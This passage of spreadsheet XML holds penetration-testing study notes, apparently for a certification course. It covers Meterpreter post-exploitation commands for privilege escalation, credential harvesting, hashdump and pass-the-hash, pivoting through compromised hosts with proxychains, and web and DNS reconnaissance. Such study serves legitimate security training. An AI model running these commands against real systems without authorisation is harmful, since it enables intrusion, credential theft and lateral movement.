8. Setup msf multi handler, place payload into the vulnerable path, restart the service via Services applet OR REBOOT THE SYSTEM if cannot run the process as an admin, and wait for the meterpreter session as SYSTEM or other user. 
</t>
  </si>
  <si>
    <t>Links</t>
  </si>
  <si>
    <t xml:space="preserve">Windows - https://docs.google.com/document/d/1U10isynOpQtrIK6ChuReu-K1WHTJm4fgG3joiuz43rw/edit?hl=en_US
Linux - https://docs.google.com/document/d/1ObQB6hmVvRPCgPTRZM5NMH034VDM-1N-EWPRz2770K4/edit?hl=en_US
Metasploit - https://docs.google.com/document/d/1ZrDJMQkrp_YbU_9Ni9wMNF2m3nIPEA_kekqqqA2Ywto/edit?pref=2&amp;pli=1
https://github.com/mubix/post-exploitation-wiki
http://tim3warri0r.blogspot.com/
</t>
  </si>
  <si>
    <t xml:space="preserve">Involves getting local information such as files, enumerating credentials, accounts, IM logs,, internal network blocks, intranet servers, domains, shares, printers etc. 
</t>
  </si>
  <si>
    <t>Pillaging/ Data Harvesting/ Enumeration</t>
  </si>
  <si>
    <t>User ID</t>
  </si>
  <si>
    <t>getuid 
in meterpreter session</t>
  </si>
  <si>
    <t xml:space="preserve">Get the current user </t>
  </si>
  <si>
    <t>Metasploit Pillage Commands</t>
  </si>
  <si>
    <t>In meterpreter:
run post/windows/gather -&gt; lists all relevant commands</t>
  </si>
  <si>
    <t>List all pillaging commands in metasploit</t>
  </si>
  <si>
    <t>In meterpreter:
run post/linux/gather -&gt; lists all relevant commands</t>
  </si>
  <si>
    <t>Awk</t>
  </si>
  <si>
    <t>Formatting Data</t>
  </si>
  <si>
    <t>file | awk -F '&lt;delimiter&gt;' &gt; outfile</t>
  </si>
  <si>
    <t>Format a text file i.e. Remove date from ip address</t>
  </si>
  <si>
    <t>Domains</t>
  </si>
  <si>
    <t>net view 
net domain
or run enum_domains</t>
  </si>
  <si>
    <t>Find if a compromised box is a part of domain</t>
  </si>
  <si>
    <t>net group "Domain Controllers" /domain</t>
  </si>
  <si>
    <t>List all Domain controllers in the domain</t>
  </si>
  <si>
    <t>Users</t>
  </si>
  <si>
    <t>cat /etc/password (linux)
net user</t>
  </si>
  <si>
    <t>Find users on a machine</t>
  </si>
  <si>
    <t>meterpreter:
run post/windows/gather/enum_ad*</t>
  </si>
  <si>
    <t>List enumeration scripts for active directory.
ONLY WORKS IF THE MACHINE IS A PART OF A DOMAIN</t>
  </si>
  <si>
    <t>Groups</t>
  </si>
  <si>
    <t>net localgroup -&gt; list all groups that exist on the domain
net localgroup &lt;group&gt; -&gt; list all users within a particular group</t>
  </si>
  <si>
    <t>Shares</t>
  </si>
  <si>
    <t>net share
meterpreter -&gt; run enum_shares</t>
  </si>
  <si>
    <t>winenum</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Automated pillaging/ information retrieva/ enumeration tool with meterpreter
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>run winenum</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Meterpreter:
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>search -d &lt;directory i.e.C:\\Users\\els\\ -f * .kdbx</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">Search for a KeePass database file on target machine </t>
  </si>
  <si>
    <t>1. Identify odd looking applications running on the box and try to find metasploit modules which will look for credentials.
Run post/windows/gather/enum_applications
meterpreter -&gt; run post/windows/gather/credentials/
more gathering scripts = post/multi/gather
post/windows/gather/credentials/credential_collector -&gt; gathers all creds...</t>
  </si>
  <si>
    <t>List all enumeration scripts in meterpreter for gathering credentials from a target machine</t>
  </si>
  <si>
    <t>SSH Dynamic Port Forwarding</t>
  </si>
  <si>
    <t xml:space="preserve">https://netsec.ws/?p=278
</t>
  </si>
  <si>
    <t xml:space="preserve">Use this is PTP when meterreter sessions die etc. </t>
  </si>
  <si>
    <t>Data Exfiltration over DNS</t>
  </si>
  <si>
    <t>Refer to 6.3.1 in PTP</t>
  </si>
  <si>
    <t>Mapping the Internal Network</t>
  </si>
  <si>
    <t xml:space="preserve">Map the internal organizations network in order to find other exploitable machines. 
As we have access to at least one internal machine, we can interact with the internal network using the compromised machine as a bridge. </t>
  </si>
  <si>
    <t>Collect information about:
- Network equipment such as firewalls, switches, routers
- Host and servers (OS, ports, exploiotables services)
- Networking protocols and IP addresses
- Traffic and data transmitted in the network</t>
  </si>
  <si>
    <t xml:space="preserve">1. Start out with ifconfig
Will tell us ip address, and NICS on the machine. 
2. Run a route PRINT -&gt; see what we are connected to 
3. Run arp -&gt; see other machines in the network 
4. Run netstat -&gt; allows us to display all the hosts network connections. i.e current connection with other hosts in the network. netstat -ano
*Note: We may discover new subnets from our scans -&gt; we cannot actively scan these subnets from the attacker machine so we have to do so from the compromised machine as they are directly connected to the subnet. Use the metasploit ping_sweep module for this.  
5. Run netenum in meterpreter
6. Once done we can pivot etc. 
</t>
  </si>
  <si>
    <t>ARP Scanner</t>
  </si>
  <si>
    <t xml:space="preserve">meterpreter:
run arp_scanner -r &lt;compromised_ip&gt; </t>
  </si>
  <si>
    <t>Discover machines on the network using meterpreter arp scanner</t>
  </si>
  <si>
    <t>msfconsole:
use post/multi/gather/ping_sweep
Scan new subnets and set the session to the compromised host</t>
  </si>
  <si>
    <t>Discover new hosts in a target network using a ping sweep</t>
  </si>
  <si>
    <t>Pivoting Process</t>
  </si>
  <si>
    <t xml:space="preserve">Now that we know the addresses of new targets, we scan scan them and check enabled services, OS etc.
We cannot directly access these machines from our attacker station, so we have to tunnel our traffic through the session on the exploited box. This is called Pivoting. 
</t>
  </si>
  <si>
    <t>https://multiplex3r.github.io/posts/2016-10-14-pivoting-with-meterpreter-and-reverse-port-forwards/</t>
  </si>
  <si>
    <t>Pivoting Process - Routes</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Use the below command in msfconsole to route traffic from attacker station to internal network:
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">route add &lt;target subnet i.e. 10.10.10.0&gt; &lt;netmask i.e. 255.255.255.255&gt; &lt;session id i.e 2&gt; 
OR use post/windows/manage/autoroute </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>-&gt; add session on compromised host, add subnet you want to hit (i.e. 10.10.11.0 which may be unreachable by the attacker machine)</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
route print </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">-&gt; to check current routes on your machine
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">route flush </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">-&gt; to delete all routes
OR WE CAN USE THE BELOW COMMAND within a meterpreter session
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">run autoroute -s &lt;target subnet i.e. 10.10.10.0/24&gt;
We can now run any msf scripts and can reach the internal network directly from our machine
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>i.e use auxiliary/scanner/portscan/tcp</t>
    </r>
  </si>
  <si>
    <t>proxychains4</t>
  </si>
  <si>
    <t>Sometimes Metasploit modules are not enough as we need to use Nmap/ Nessus
We have to set up a sock4 proxy and use proxychains to route traffic through the proxy
1. msf: use auxiliary/server/socks4a
Once run, the module will listen for incoming connections on the SRVPORT specified in options
2. Configure proxychains4 
Nav to /etc/proxychain.conf
Change the last line to 
&lt;local address i.e 127.0.0.1&gt; &lt;port our socks4 proxy is listening on&gt;</t>
  </si>
  <si>
    <t>Research this more!</t>
  </si>
  <si>
    <t xml:space="preserve">Pivoting Process - Connect to internal Services (use nmap etc thru the route). </t>
  </si>
  <si>
    <t>proxychains ssh &lt;internal_ip&gt;
Simply run the command through the proxychains socks4a proxy
0. Setup portfwd add -l (attacker machine listening port i.e 8080/ just do same as attacker&gt; -p &lt;port you want to connect to on target machine i.e 80&gt; -r &lt;target_ip&gt; or run 
1. use auxiliary/server/socks4a _&gt; change to port 1081 if doesnt work
2. This will route everythign through your current metasploit routes
3. Edit the proxychains.conf file @ /etc/proxychains.conf
4. Add socks4 127.0.0.1 1080 to the end of the file. _&gt; try port 1081 if it doesnt work
5. proxychains4 &lt;command you want to run i.e ssh root@10.10.10.10 or proxychains4 iceweasal&gt;</t>
  </si>
  <si>
    <t>Check video for further explaination</t>
  </si>
  <si>
    <t xml:space="preserve">We can log into the OS by just providing the hashed version of the password (NT or LM) instead of cleartext.
Just do hashdump then psexec msf module </t>
  </si>
  <si>
    <t>PTP 6.5</t>
  </si>
  <si>
    <t>binwalk</t>
  </si>
  <si>
    <t>Steganography</t>
  </si>
  <si>
    <t>We can use the binwalk tool to anaylyse images we may find in the network. 
Sometimes can hold files inside images etc</t>
  </si>
  <si>
    <t>Powershell Empire</t>
  </si>
  <si>
    <t>https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993</t>
  </si>
  <si>
    <t>Local Exploit Enumeration</t>
  </si>
  <si>
    <t xml:space="preserve">Find all exploits available on the machine. Can be used for priv esc easily. </t>
  </si>
  <si>
    <t>meterpreter &gt; reboot -f 2</t>
  </si>
  <si>
    <t>Reboot a machine in order to run the new exetable in the unquoted service path as perm x</t>
  </si>
  <si>
    <t xml:space="preserve">IF our meterpreter session dies nearly instantly on connection, we need to migrate our meterrpeter session to another service.
In msfconsole (exploit/multi/handler):
1. set AutoRunScript &lt;service i.e. Explorer&gt;
2. set AutoRunScript migrate -f </t>
  </si>
  <si>
    <t>WHOIS</t>
  </si>
  <si>
    <t xml:space="preserve">whois -h -&gt; help menu
</t>
  </si>
  <si>
    <t>Gather information about a domain address i.e. Google.com</t>
  </si>
  <si>
    <t>https://www.cloudflare.com/en-au/learning/dns/dns-records/</t>
  </si>
  <si>
    <t>nslookup</t>
  </si>
  <si>
    <t>nslookup &lt;domain_name i.e. Google.com&gt; -&gt; A record lookup</t>
  </si>
  <si>
    <t xml:space="preserve">nslookup allows us to translate ip addresses to hostnames and vice versa. </t>
  </si>
  <si>
    <t>nslookup -type=PTR &lt;target_ip&gt;</t>
  </si>
  <si>
    <t>Reverse DNS lookup (ip to host)</t>
  </si>
  <si>
    <t>nslookup -querytype=ANY &lt;domain_name&gt;</t>
  </si>
  <si>
    <t>Query DNS server for whole record associated with the domain.
Will show:
- Name servers
- A records
- CNAMES
- MX Record</t>
  </si>
  <si>
    <t>HTTP</t>
  </si>
  <si>
    <t>Webserver Fingerprinting (server version etc.)</t>
  </si>
  <si>
    <t>80/ 443 - HTTPS/S</t>
  </si>
  <si>
    <t>GET / HTTP/1.1
Host: test.site</t>
  </si>
  <si>
    <t xml:space="preserve">We can sometimes determine the webserver type (IIS/ apache etc) via a http request and response. </t>
  </si>
  <si>
    <t>DNS Name Server</t>
  </si>
  <si>
    <t xml:space="preserve">The nameserver is the DNS server that replies to all lookup queries regarding the namespace of a domain. i.e an nslookup query for google.com involves a request to a nameserver for resolution of the domain name to ip. </t>
  </si>
  <si>
    <t xml:space="preserve">We can use netcat to manually identify the webserver version. </t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">nc &lt;target_ip&gt; 80
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">HEAD / HTTP/1.0
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>Remember to hit enter twice</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">HTTP Request using netcat. Will tell us the </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">server version.
Also, look for X-Powered-By </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">-&gt; this may reveal the technology behind the web app i.e ASP.NET
Also, check the cookie format:
PHP -&gt; PHPSESSID=XXXXX
.NET -&gt; ASPSESSIONIDYYYY=XXXX
JAVA -&gt; JSESSION=XXXXX
The above will tell use what technology is being used (language) </t>
    </r>
  </si>
  <si>
    <t>http 
request
cookies</t>
  </si>
  <si>
    <t>whatweb</t>
  </si>
  <si>
    <t>whatweb -h
-v for more output
navigate to ~/tools/WhatWeb
./whatweb &lt;domain_name&gt;</t>
  </si>
  <si>
    <t>Whatweb can be used to detect webserver version</t>
  </si>
  <si>
    <t>wappalyzer</t>
  </si>
  <si>
    <t>Install as a plugin in firefox -&gt; automatically detects the version, tech etc of a site</t>
  </si>
  <si>
    <t>Webserver Modules</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Look for:
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>Apache = mod_rewrite module or .htaccess
IIS = Ionic Isapi Rewrite or Helicon Isapi Rewrite</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">Some modules can be used to translate an ugly URL to a clean one to be read easily by the end user. 
We need to identify these modules as they can obfuscate URLs.
</t>
  </si>
  <si>
    <t>Enumerating Sub Domains</t>
  </si>
  <si>
    <t xml:space="preserve">Tools to use:
dnsrecon
subbrute
fierce
Nmap
dnsenum
knock
theHArvester
recon-ng
</t>
  </si>
  <si>
    <t xml:space="preserve">Starts with mapping all available subdomains within a domain name. </t>
  </si>
  <si>
    <t>subbrute</t>
  </si>
  <si>
    <t xml:space="preserve">Subbrute uses wordlists to brute force subdomains. i.e multiple requests using a wordlist to a server and checking for a valid response
https://github.com/TheRook/subbrute
</t>
  </si>
  <si>
    <t>dnsrecon</t>
  </si>
  <si>
    <t>dnsrecon -h</t>
  </si>
  <si>
    <t xml:space="preserve">Similar to subbrute, </t>
  </si>
  <si>
    <t>nslookup
server [NAMESERVER for target domain]
ls -d &lt;target domain&gt;
OR
nslookup -type=NS &lt;target domain&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">We can enumerate DNS records for a domain. This includes all subdomains. </t>
  </si>
  <si>
    <t>dig @nameserver axfr &lt;target domain&gt; +nocookie</t>
  </si>
  <si>
    <t>dig is way better for some reason, nslookup never works xd</t>
  </si>
  <si>
    <t>Finding Virtual Hosts</t>
  </si>
  <si>
    <t>A virtual host is a website that shares an IP address with one or more virtual hosts. These hosts are domains and subdomains.
i.e. One ip but multiple websites</t>
  </si>
  <si>
    <t>Fingerprinting Frameworks and Applications</t>
  </si>
  <si>
    <t>We may need to check the webpage for footers that detail what app is being used.
Also, we may need to inspect the source code and look for information in the META tags and in html comments.
i.e. Content=Wordpress...</t>
  </si>
  <si>
    <t xml:space="preserve">Once we have a list of subdomains, we can start to look at the webpages on each subdomain.
Common applications may be:
forums (phpBB, vBulletin)
CMS's (Joomla or Drupal)
CRMs, blogging platforms (wordpress)movable types)
social networking scripts
When we have an application and its version, we can simply search online for vulnerabilities. </t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">HTTP Get Request
Check for </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>X-Content-Encoded-By: &lt;app&gt; &lt;version&gt;</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">Sending a get request will often show the application used by the web page. </t>
  </si>
  <si>
    <t>Fingerprinting Third Party Add Ons - Joomla</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Joomla add ons can be found by looking at the url.
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>Index.php?option=%component_name%&amp;task=%task_value%</t>
    </r>
  </si>
  <si>
    <t>Fingerprint Custom Applications</t>
  </si>
  <si>
    <t>Think about the application and:
what it is for, does it allow user registration, does it have an admin panel, does it take user input, what kind of input, accepts file uploads, uses javascript/ajax/ or flash</t>
  </si>
  <si>
    <t xml:space="preserve">Burpsuite - Spidering </t>
  </si>
  <si>
    <t xml:space="preserve">We can use burpsuite for a number of tasks, however we will use it to identify web page inputs/ outputs, response headers, spidering a website for all webpages etc. </t>
  </si>
  <si>
    <t>spidering</t>
  </si>
  <si>
    <t xml:space="preserve">Burpsuite </t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Process: </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>*ENSURE YOU USE AN OLD VERSION OF BURPSUITE</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
1. Setup proxy
2. Click spider tab
</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">Crawl/ spider a website i.e. Find all pages, publicly available resources, etc. </t>
  </si>
  <si>
    <t>Functional Graph</t>
  </si>
  <si>
    <t xml:space="preserve">Refer to 2.4.2 in PTP.
We need to ask a number of questions when enumerating a website. Refer to the ptp slides to see what areas to investigate. 
Refer to blocks and ensure we flowchart correctly. </t>
  </si>
  <si>
    <t>Mapping the Attack Surface</t>
  </si>
  <si>
    <t>We need to map the attack surface when assessing web servers and pages. 
Use a flowchat mapping tool as shown on 2.4.3 of PTP slides. Check each subcategory to go into further detail.</t>
  </si>
  <si>
    <t>Mapping the Attack Surface - Client Side Validation</t>
  </si>
  <si>
    <t>To find if client side validation, check the source code in inspector (f12?)</t>
  </si>
  <si>
    <t>User submitted data can be validation on the client side, server side, or both.
Recognising where the validation occurs will allow us to manipulate the input in order to mount our input validation attacks like SQL injection, XSS or logic flaws.</t>
  </si>
  <si>
    <t>Mapping the Attack Surface - Database Interaction</t>
  </si>
  <si>
    <t>Checking for SQL injections. By this we mean that the user input changes the appearance of the page because either different data is fetched from the db.</t>
  </si>
  <si>
    <t xml:space="preserve">Mapping the Attack Surface - File Uploading and Downloading </t>
  </si>
  <si>
    <t xml:space="preserve">Find dynamic downloads i.e. A user supplies an input and requests to download a specific file.
Used to find LFI and RFI vulns. </t>
  </si>
  <si>
    <t>Mapping the Attack Surface - Display of User Supplied Data</t>
  </si>
  <si>
    <t>Find displayed user supplied data i.e. X searched for this...</t>
  </si>
  <si>
    <t>Mapping the Attack Surface - Redirects</t>
  </si>
  <si>
    <t xml:space="preserve">Find redirects (3XX response codes). We can do HTTP response splitting and other Header Manipulation attacks when redirects are not handled properly. </t>
  </si>
  <si>
    <t>Mapping the Attack Surface - Access Controls and Login Protected Pages</t>
  </si>
  <si>
    <t xml:space="preserve">Login pages reveal restricted areas of sites. 
Use brute forcing to test security. </t>
  </si>
  <si>
    <t>Mapping the Attack Surface - Error Messages</t>
  </si>
  <si>
    <t xml:space="preserve">Collect errors while browsing. </t>
  </si>
  <si>
    <t>Mapping the Attack Surface - Charting</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Refer to 2.4.3 charting slide
Use a </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">tree chart </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">for a few blocks. </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">Table based </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">chart for testing vulnerabilities in each block. 
</t>
    </r>
  </si>
  <si>
    <t>Mapping the Attack Surface - Example</t>
  </si>
  <si>
    <t xml:space="preserve">A database interaction should be tied to a test for a SQL injection. 
An access restricted page may be checked against authentication bypass techniques. </t>
  </si>
  <si>
    <t>PTP METHODOLOGY*</t>
  </si>
  <si>
    <t>https://cdn.members.elearnsecurity.com/ptp_v5/section_2/module_1/attachment/eLearnSecurity_Handling_Information.pdf</t>
  </si>
  <si>
    <t>PTP slides 2.5</t>
  </si>
  <si>
    <t>dirbuster</t>
  </si>
  <si>
    <t>Finding Hidden Files</t>
  </si>
  <si>
    <t xml:space="preserve">We can use dirbuster to find hidden files on a website. Tries to brute force common pages and checks response codes. Can get dirbuster to search for specifc files such as .php files. </t>
  </si>
  <si>
    <t>Back up and Source Code File</t>
  </si>
  <si>
    <t xml:space="preserve">Search for the below file types:
bak, bac, old, 000, ~, 01, _bak, 001, inc, Xxx
cgi, inc
</t>
  </si>
  <si>
    <t xml:space="preserve">We can search the website thru crawling (dirbuster or burp) to find backup and source code files which will sometimes contain credentials we can use to login.
</t>
  </si>
  <si>
    <t>Find Directory Listings</t>
  </si>
  <si>
    <t xml:space="preserve">Write a script in python taking the results of a Dirbuster (all the public and hidden directories found) and do a GET request to each directory found. Look at the web page content to search for patterns like 'To parent directory', Directory Listing For, Index Of... </t>
  </si>
  <si>
    <t xml:space="preserve">Shows contents of the website in a directory format, often a result of misconfiguration. </t>
  </si>
  <si>
    <t>Log and Configuration Files</t>
  </si>
  <si>
    <t xml:space="preserve">Every web app has a config file placed somewhere in the apps folder structure. </t>
  </si>
  <si>
    <t>Logs are text files left on the web server by applications to keep track of different activites, errors, login s etc 
Config files contain settings and preferences regarding the web applications installed. They may contain the username and password that the app uses to connect to the db.</t>
  </si>
  <si>
    <t>curl</t>
  </si>
  <si>
    <t>HTTP Verbs and File Upload</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1. Check availability of the PUT verb. We can use the PUT verb to upload files (only to writeable directories)
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">curl -X OPTIONS &lt;http://target_domain&gt; -i
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>Issue the above to check all HTTP Verbs allowed on the server. Note, if the OPTIONS verb is not available. We will not be able to enumerate all the verbs. We will have to manually test them. 
2. Look to writeable directories. This is guesswork lol
3. Upload using put command and check web browser to see if it is there...</t>
    </r>
  </si>
  <si>
    <t>HTTP Response Codes</t>
  </si>
  <si>
    <t>https://www.restapitutorial.com/httpstatuscodes.html</t>
  </si>
  <si>
    <t xml:space="preserve">Encoding </t>
  </si>
  <si>
    <t>Encoding - Overview</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Content of web pages are displayed according to a CHARSET. A </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">charsrt </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">contains a set of characters, they represent the set of all symbols that the end user can display in their browser window. A charset contains a symbol and a code point (numeric index). i.e the ascii charset does not show chinese symbols, therefore those symbols will not be processed on the web page. </t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">Information encoding is used to represent the low level mapping of the information being handled.
Occurs each time an application needs to process any data. 
</t>
  </si>
  <si>
    <t>Encoding - Character Encoding</t>
  </si>
  <si>
    <t xml:space="preserve">Character encoding is the representation, in bytes, of the symbols of a charset; a mapping of the symbols to a series of ordered bytes so that your data can get to you. 
A symbol can be represented by 1 or more bytes. </t>
  </si>
  <si>
    <t>Encoding - HTML Entity</t>
  </si>
  <si>
    <t>Encoding</t>
  </si>
  <si>
    <r>
      <t>A HTML entity is simply a string that corresponds with a symbol. It starts with &amp; or &amp;# and ends with ;
Example -&gt; &amp;</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>encoded_character</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>; i.e &amp;lt; = &lt; (the less that character)
Hexadecimal:
&amp;#H; -&gt; where H is the hexadecimal number i.e. &amp;#x3c;</t>
    </r>
  </si>
  <si>
    <t>Encoding - URL Encoding</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Encoding is important because it limits the characters to be used in a url to a subset of characters:
1. Unreserved chars: </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">[a-z A-Z] [0-9] [-._~]
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">2. Reserved chars (have a specific purpose): </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">:/?#[]@!$&amp;"()*+,;=%
Reserved chars must be encoded in a url when they have no special role inside the url.
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">i.e. %23 = # </t>
    </r>
  </si>
  <si>
    <t>URLs sent over the internet must contain characters in the range of the US-ASCII code character set. If unsafe characters are preset in a URL, encoding them is required. 
https://www.w3schools.com/tags/ref_urlencode.asp</t>
  </si>
  <si>
    <t>Encoding - URL Encoding - Percent Encoding</t>
  </si>
  <si>
    <t>Common encoded characters:
# = %23 = seperate anchors
? = %3F = Seperate query string
&amp; = seperate query elements
+ = %2B = indicates a space</t>
  </si>
  <si>
    <t xml:space="preserve">Some characters are encoded by the use of a % plus 2 hexadecimals. </t>
  </si>
  <si>
    <t>Base 64</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Alphabet of Base64 encoding is [0-9] and [a-z A-Z] and (+) (/) characters
Totals </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>64 values</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">Base64 is a binary to text encoding schema used to convert binary files and send them over the internet. </t>
  </si>
  <si>
    <t>Same Origin Policy</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Origin = must be on the same protocol, host, and port. 
i.e. Www.index.com is not the same origin as index.com (different host).  
Https is different to http
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">Main rule of SOP:
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">A document can access (through JavaScript) the properties of another document only if they have the same origin.  </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
Document refers to HTML page, an iframe included in the main page, or a response to an AJAX request. 
</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">*Note: Internet explorer does not care about port or trust zones (corporate domains) when determining same origin </t>
  </si>
  <si>
    <t>Same Origin Policy - Exception - Window.location</t>
  </si>
  <si>
    <t xml:space="preserve">A document can always write the location property of another document. 
The window.location object can be used to get the current page address (URL) and to redirect the browser to a new page. </t>
  </si>
  <si>
    <t>Cookies</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">A cookie is used to identify a user session on a website. 
A server sets the cookie in the </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">Set Cookie </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>header filed in a HTTP response message. 
A website can only set a cookie for its domain and its subdomains 
